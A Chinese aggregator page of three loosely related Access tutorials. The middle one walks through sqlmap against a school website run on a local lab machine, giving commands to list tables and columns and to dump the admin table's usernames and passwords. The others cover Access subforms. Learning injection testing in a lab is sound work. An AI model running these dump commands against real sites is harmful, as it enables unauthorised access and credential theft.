一 : access数据库教程
[access数据库学习]access数据库教程——简介二 : Sqlmap简单注入access数据库教程
什么是SQLMap?[www.61k.com)
SqlMap是一个开放源码的渗透测试工具,它可以自动探测和利用SQL注入漏洞和接管数据库服务器的过程。它通过了一个强大的检测引擎,最终渗透测试和广泛的从数据库中的指纹持久的开关,从数据库中提取数据,访问底层的文件系统和操作系统执行命令的许多利基功能带外连接。
项目网站:http://sqlmap.sourceforge.net/
支持的数据库:MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB,几乎囊括了市面上所有的数据库
对于Sqlmap的强悍,用过了才知道
下面通过一个简单的实例演示:
测试环境:Backtrack 5&windows7(x64)sqlmap/1.0-dev(r4405)
本打算用windows2003下的iis环境,可惜电脑配置跑不动两个虚拟机,直接在本机win7下用小旋风搭建iis,虚拟机开Backtrack 5跑sqlmap.
我这里用的是”校无忧学校网站 ”源码,
注入点的查找不多说,这里找到一个:http://192.168.121.1/NewsView.asp?id=8
我这里只获得列名,表名,和内容.Backtrack 5运行我们的Sqlmap神器,
输入命令:python sqlmap.py -u http://192.168.121.1/NewsView.asp?id=8 –tables
是否列表名,选Y
设置线程,我这里设置8
只需要一分钟不到,表段就爆出来了
下面爆字段,输入命令:python sqlmap.py -u http://192.168.121.1/NewsView.asp?id=8 –columns -T ” admin”查看admin表所在的列名
速度一样飞快
获取内容,python sqlmap.py -u http://192.168.121.1/NewsView.asp?id=8 –dump -C “username,password” -T “admin”
这只是Sqlmap功能的九牛一毛,若想深入了解,推荐阅读Sqlmap说明文件
扩展:sqlmap access注入 / access数据库注入 / access数据库手工注入
三 : 用access引用子窗体来显示数据的图文教程
我们在查询设计过程中,利用access易开发,快速特点来制作查询工具,然而采用access工具都会用到子窗体显示数据。引用子窗体是可以通过用户与机器间交互条件来显示用户想要的数据。
那么我们用子窗体功能,如何设置呢?
方法:
一、打开你已经链接好表以及制作的查询的access文件,我们可以创建窗体,在主窗体上点击上面工具栏的子窗体/子报表。
二、拉入主窗体,就会弹出对话框,我们可以用现有窗体创建子报表,也可以用查询自行创建。它的数据来源可以现有的表和查询,也可以用现有窗体。这根据你想显示什么查询数据。
三、下一步我们就要确认你的查询或表的字段。点击倒三角就可以查看到你的表或查询,你可以一个个选择到右边对话框,也可以一次性全选择。
四、下一步就可以命名你的子窗体的名称。点击完成就可以了。
五、当然也有些用户需要通过人机交互之后如时间条件来查询,通常都会想通过点击按钮来显示子窗体,这样我们可以用vb语言代码来实现。我们先右键按钮点击事件生成器。
输入代码:Me.NDNS_XM子窗体.Reguery
本文标题:access数据库教程-access数据库教程61阅读| 精彩专题| 最新文章| 热门文章| 苏ICP备13036349号-1